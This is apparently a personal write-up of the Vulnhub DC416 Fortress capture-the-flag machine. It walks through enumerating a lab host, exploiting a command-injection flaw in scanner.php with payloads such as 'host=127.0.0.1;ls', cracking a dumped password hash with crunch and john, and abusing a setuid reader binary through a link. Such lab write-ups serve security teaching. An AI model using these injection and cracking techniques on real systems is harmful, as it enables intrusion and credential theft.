Vulnhub – DC416 Fortress Walkthrough

This is my first write-up on Vulnhub – DC416 Fortress challenge. We start by enumerating services. but before that we have to find out the IP Address of our machine.

Information Gathering

netdiscover will scan all active devices on our network. (Our Target is: 192.168.1.6)

Now, that we know our target IP Address let’s find out which services are running. Nmap scan suggests that server is running FreeBSD and have few services running.

If we take a look at port 80 we have Apache server running so let’s take a look.

There’s nothing on that page i through to curl it to make sure there’s nothing hidden inside but no luck.

Now, it’s time for my favorite part directory enumeration.

So for that we have some awesome tools installed already in Kali Linux but my favorite is dirb and dirbuster. We had not luck because we couldn’t find any directory so let’s try searching for files. We know server is running Apache so why not give it a try to search for .php extensions.

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt

let’s do it!

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt -X .php

And we found our first lead scanner.php file. (https://192.168.1.6/scanner.php) let’s take a look.

So we have something here. let’s try to find out what is it?

We have a input field where we enter an IP and it runs Nmap command. Good! Maybe we can try command injection here, so let’s take a look at it’s response through Burp.

Read About Command Injection Here: Command Injection | OWASP Foundation

So, we did try command injection looks like there’s some kind of filtration.

POST /scanner.php HTTP/1.1 Host: 192.168.1.6 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.6/scanner.php Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 17 host=127.0.0.1;ls

HTTP/1.1 200 OK Date: Thu, 08 Mar 2018 23:53:45 GMT Server: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27 X-Powered-By: PHP/5.6.27 Content-Length: 472 Connection: close Content-Type: text/html; charset=UTF-8 S C A N N 3 R

Command: /usr/local/bin/nmap -F -sT 127.0.0.1;ls 
Nope. Good try though… 💋

So, this didn’t worked!

host=127.0.0.1;ls

let’s try again!

host=127.0.0.1 ls

Awesome!

Now after doing ls -la we found these directories.

  • k1ngd0m_k3yz
  • s1kr3t

These two directories looks strange let’s have a look.

total 144 drwxr-xr-x 4 root wheel 512 Nov 9 2016 . drwxr-xr-x 6 root wheel 512 Nov 9 2016 … -rw-r–r-- 1 root wheel 561 Nov 8 2016 index.html drwxr-xr-x 2 root wheel 512 Nov 9 2016 k1ngd0m_k3yz -rw-r–r-- 1 root wheel 44867 Nov 4 2016 logo.png drwxr-xr-x 2 root wheel 512 Nov 9 2016 s1kr3t -rw-r–r-- 1 root wheel 759 Nov 5 2016 scanner.php -rw-r–r-- 1 root wheel 612 Nov 4 2016 styles.css

  • k1ngd0m_k3yz

-rw-r–r-- 1 root wheel 157 Nov 9 2016 master -rw-r–r-- 1 root wheel 47 Nov 9 2016 passwd

  • s1kr3t

-rw-r–r-- 1 root wheel 31 Nov 4 2016 flag.txt

Now, let’s take a look inside master and passwd files.

Inside master file we have our hash. Save that to hash.txt just in case we couldn’t get any further lead.

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

Inside passwd file.

craven:*:1002:1002:User &:/home/craven:/bin/sh

flag1

The first flag can be found in the s1kr3t directory.

cat s1kr3t/flag.txt FLAG{n0_one_br3aches_teh_f0rt}

Finally, we have found our first flag.

From our previous findings we have found that there’s a user account named craven.

ls -la /home/craven/

-r-------- 1 craven craven 46 Nov 6 2016 flag.txt -rw-r–r-- 1 craven craven 119 Nov 5 2016 hint.txt -rw-r–r-- 1 craven craven 77 Nov 5 2016 reminders.txt

Look’s like we have found our second flag inside /home/craven/ directory.

We do not have read permission for flag.txt and now let’s take a look at hint.txt and reminders.txt files.

hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by mypet's name and a symbol.

reminders.txt

To buy:* skim milk* organic free-run eggs* dog bone for qwerty* sriracha

Now, that we have a hint and hint suggests that his dog name is: qwerty we’re gonna add three digits before qwerty and one symbol after and that can be done through crunch wordlist generator.

  • Qwerty
  • 3 digits
  • Symbol

crunch 10 10 -t %%%qwerty^ > pass.txt

This command will create every possible word.

Now, we have to crack hash.txt hash that we found earlier.

john -wordlist=pass.txt hash.txt

It seems that we have successfully cracked our password.

931qwerty?

Boom!

Now we’re able to get our second flag.

$ pwd /usr/home/craven $ ls flag.txt hint.txt reminders.txt $ cat flag.txt FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

flag2

FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

It’s time to get our third flag.

I did cd /home and found another user name: vulnhub. We can spot a suid binary from the user vulnhub in it’s home directory /home/vulnhub.

$ ls craven vulnhub $ pwd /usr/home

Inside vulnhub directory we have our third flag and reader file.

$ ls flag.txt reader

By doing file reader we have some info about reader file.

reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

Since we can execute reader file as carven user we can read our third flag let’s try.

It seems the binary checks the filename for flag.txt so let’s try to trick this check with a symbolic link:

Now to a hard link. (Linux Ln Command Help and Examples)

Boom!

flags3

FLAG{its_A_ph0t0_ph1ni5h}